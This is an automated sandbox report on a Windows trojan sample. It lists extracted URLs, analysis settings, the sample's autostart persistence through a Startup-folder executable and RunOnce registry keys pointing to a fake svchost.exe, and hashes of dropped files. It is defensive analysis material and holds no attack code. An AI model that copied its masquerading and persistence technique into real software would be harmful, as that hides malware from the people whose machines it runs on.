https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry= | svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0C | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0D | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
http://www.bingmapsportal.comsv | svchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | AdvancedRun.exe, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0 | RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000010.00000003.328602178.00000188CA245000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp | false | | high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dynamic.t | svchost.exe, 00000010.00000002.332002756.00000188CA265000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPub | RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp | false | | high
https://activity.windows.com | svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmp | false | | high
https://%s.dnet.xboxlive.com | svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmp | false | | high

                                                                                      Contacted IPs


                                                                                      Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.1
                                                                                      127.0.0.1

                                                                                      General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483549
Start date: 15.09.2021
Start time: 08:52:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RYhdmjjr94 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 87
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.winEXE@122/68@0/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.8%)
• Quality average: 83%
• Quality standard deviation: 25.9%
HCA Information:
• Successful, ratio: 66%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 23.55.161.144, 23.55.161.150, 23.55.161.143, 23.55.161.149, 23.55.161.142, 23.55.161.147, 23.55.161.152, 23.55.161.148, 23.55.161.146, 20.82.210.154, 20.42.73.29, 52.182.143.212, 20.189.173.22
• Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may have missing behavior and disassembly information.
• Report size exceeded the maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

Time | Type | Description
08:53:15 | API Interceptor | 2x Sleep call for process: svchost.exe modified
08:53:33 | API Interceptor | 317x Sleep call for process: powershell.exe modified
08:53:38 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
08:53:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71 C:\Users\Public\Documents\2FDD6624\svchost.exe
08:54:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71 C:\Users\Public\Documents\2FDD6624\svchost.exe
08:54:32 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
08:55:07 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      No context

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      No context

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.5955327958478372
Encrypted: false
SSDEEP: 6:bYtek1GaD0JOCEfMuaaD0JOCEfMKQmDIS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bINGaD0JcaaD0JwQQZtAg/0bjSQJ
MD5: 93A41A680641FAE8774E80C3A4D5030D
SHA1: 28B20B57746D3C6203DA181122A8CE63552CED27
SHA-256: 1C911D9ECF47823023932EE98BC8F5CF9D338F7D2CE3C6C530D2127E0BE6C204
SHA-512: BF98848C7F649DFD7E598F717D65C1188741B371D447F94038E90462AFD9A9F7422F9D6E7E4AC7C14F5E721416A0E0D444F5B5B9A9F3585D3587E0CC83D84E25
Malicious: false
Reputation: unknown
                                                                                      Preview: ....E..h..(......5...y[.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................5...y[...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbb689bbd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.09626539073619653
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:K4zwl/+gqX7klXRIE11Y8TRXXnlI8KA4zwl/+gqX7klXRIE11Y8TRXXnlI8K:50+/glXO4blXlLKP0+/glXO4blXlLK
                                                                                      MD5:5C63BD7D668A7342CAB71709F2D7D62D
                                                                                      SHA1:C294BF0B2C31E6D88B9A242FB282998802F38748
                                                                                      SHA-256:C0FF6CAAE989920A2CD19A64B3E1E974BEB19F8022112B89219F701D9029CBAF
                                                                                      SHA-512:C135DB5B3C3CDD374811D694C2877CDD55652F6936A3CA659238FC08368C7A0F05D723D1FCD70D27912612BD588EE596996FC626B257A5AD93A6C4CFE3886F4E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .h..... ................e.f.3...w........................&..........w...5...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................:'2..5...y.....................I.5...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8192
                                                                                      Entropy (8bit):0.11120274726775213
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:6V/TEvqQ8wl/bJdAtixbqi9cbAll:6QqQbt41A
                                                                                      MD5:3F9F494540C9DB73C7A33507125AFE83
                                                                                      SHA1:93C2620A4D372FA341B2ECE1A5C6990AF3262D03
                                                                                      SHA-256:43D582CE346697710D1BD21FF59CC446A58489DDBD3CCE6F40B48BC7F857CBDC
                                                                                      SHA-512:DD1853C9BCAE2B6FEA4FE5A69F2D546F609CB31DDD0CB278B16C8EA5E1E916680B3C0981D6B9E20EA952109D23EAFD50FE6D808F53AEDDDC037363E4B83C9570
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..u......................................3...w...5...y.......w...............w.......w....:O.....w.....................I.5...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RYhdmjjr94.exe_89963238c73da7d78cda02a97e2a0a7dda8e9bf_d37fc9e5_188fe961\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):16058
                                                                                      Entropy (8bit):3.763304934441823
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:18JrD6YeGrHBUZMXCaKGgMWmjbO/u7s6S274It/A:6lujyBUZMXCaV3O/u7s6X4It/A
                                                                                      MD5:B4F344BE7B8F817756C93C4AC13EEC14
                                                                                      SHA1:A1E684E56118634EFBEA226585213407CDEF52E1
                                                                                      SHA-256:E1FDBEF3D95C9440A2402E484AA4A57D9447318D78AB0F1CB91FB56FA6104F89
                                                                                      SHA-512:0EEF0CC6FED1A766F79494FA76F29076C92CFCCA6AB2A99D4D8F2E6BF9A1B07A3E4FA9B15FA70DD44CFEF55DF9974E5647A2459F681B4F8370AE69D7BBCACF02
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.1.9.4.8.6.4.5.9.7.4.1.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.1.9.4.8.7.0.9.4.1.1.6.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.a.d.3.5.0.4.-.2.c.e.5.-.4.0.c.4.-.9.f.8.f.-.0.5.d.0.b.a.8.a.4.0.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.8.4.4.3.8.6.-.0.c.3.6.-.4.9.5.4.-.a.4.4.0.-.2.6.a.2.3.1.3.a.3.b.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.Y.h.d.m.j.j.r.9.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...P.y.t.h.o.n.T.o.o.l.s...I.r.o.n.P.y.t.h.o.n...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.e.8.-.0.0.0.1.-.0.0.1.6.-.2.5.c.3.-.4.b.c.9.4.9.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.7.a.e.1.7.2.6.4.3.b.6.7.1.0.5.2.f.c.b.b.2.4.1.1.1.7.8.e.5.a.0.0.0.0.0.0.0.0.!.0.0.0.0.1.f.b.6.1.a.1.d.f.5.0.0.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC994.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 15:54:26 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):294077
                                                                                      Entropy (8bit):3.780938363510606
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Lkz94lh0Tjd+p6uDowdiK0yiUCgU5HaK9gIOgF56GmCWejQoPK5I:Oelh0MpXD37oTjP9RpD2CjQU
                                                                                      MD5:B174EF5DB845E1D19D5C7ACAD1A79C7A
                                                                                      SHA1:0905EF50B7644EE721FABD5B4A9EC53BD2691A06
                                                                                      SHA-256:5848BC5857635E5BD58E50CB0E9A5CC3ECC911A4BCB420FFF7F94C06E78BE3C6
                                                                                      SHA-512:32B164219C50EEC023E5EC3CABEE1D158FCE6275456E8B835485256BAA53709660E75EDB8873177614C3B3A1EE408E5A1C593D64536A130760156D473BF36DED
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MDMP....... .......2.Ba...................U...........B......|*......GenuineIntelW...........T.............Ba.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD83B.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8412
                                                                                      Entropy (8bit):3.698431696336261
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNiZE6z6YInSUiSxtgmfZOS4Cprc89bBSsfRLm:RrlsNiq6z6YYSUptgmf8SJBRfg
                                                                                      MD5:24BEB6508039A7B946D1AD8C1C3E4753
                                                                                      SHA1:3581E2B1229F02290C83B4771C4DE78B854E378D
                                                                                      SHA-256:7A0948BF3E58DF0ABA02A570D6EF66139ECD415E7918E5F354931354811589D7
                                                                                      SHA-512:B1F82EA25D402F1B3676A467CB48BD1DF211829989AE84255B2AEDC2D77241189830E875913DEEF8BAB1443ABD518A956569881FDB4891F5ABF4EEE629BA3144
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.8.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD994.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4782
                                                                                      Entropy (8bit):4.488609851145929
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsaCJgtWI97k8hWSC8Bu8fm8M4JetN1FTU+q8vvtN2fImGvHbA7KRd:uITfaQekHSN5JetZUKvtwgBv7AKd
                                                                                      MD5:5A1025751ACE3F849799494DC0542121
                                                                                      SHA1:9720F8283F299D63DB812BC21CD2D23AB05CC450
                                                                                      SHA-256:F9EA917400E83B530C0ACB74BE5D0ADA7910D3E4DBBC5B2B96B09BD31D860232
                                                                                      SHA-512:FEDE78E049BE9BC9D035C03E13C2728202F4784B4AD05F13C5863D6E4193AFA94F8EBAFDE9502295B9C3BD2BC666639B28FAACBAD8D9B81EC291953ABDCC5D33
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1167905" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9B1.tmp.csv
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):55526
                                                                                      Entropy (8bit):3.048622853175057
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:2MHSdNPEnyHGgl522jkAeXvEZTDJ9V0X1JqPIKfS1MQj:2MHSdky3D224AeXvEZTDJ9yX1JUBWMQj
                                                                                      MD5:B8443AFCA826FE6F87455104002BB20A
                                                                                      SHA1:FE2D9FDD5FDACA132B7491529D7F9AE6FF0FFB72
                                                                                      SHA-256:467016D0B35E08DC43C13C68B59AF68A0E60F17BB9C23E26B13FF554CDBB7B34
                                                                                      SHA-512:9104B692D15DEEFA0719902B5B00FDD3111484FB2C280CD50219B9C4C4057D4716F2FE373ACB95FB1D57C5B2F73E0BF0496BBE3B0669968E1EB906701E56C9B3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE124.tmp.txt
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):13340
                                                                                      Entropy (8bit):2.6965579144991367
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:9GiZYWwn/rhpYOOYiWDyxZHpYEZRZtEifNPeZ0wL8BlaTg5tuwV4IK73:9jZDEhOQE638zaTg5tuCfK73
                                                                                      MD5:F1F8149BE3B2A006BA70879E4039A16A
                                                                                      SHA1:58AEA8916C7033E45EC8DE1544496D86F7D3824E
                                                                                      SHA-256:4A4A0F88B18D70B7B2BBDF48D55615A08AFAECA40A2DCBEA4F57BC191259C5F3
                                                                                      SHA-512:1EA7C2F37D68E008DF95F5C02507B2ED11D35B3B0405797F13907C1649DE3B43CBF5ECB33B6933F29AA5F181F552BC7695D3749B709C58281AE0510E42F8E077
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                      C:\Users\Public\Documents\2FDD6624\svchost.exe
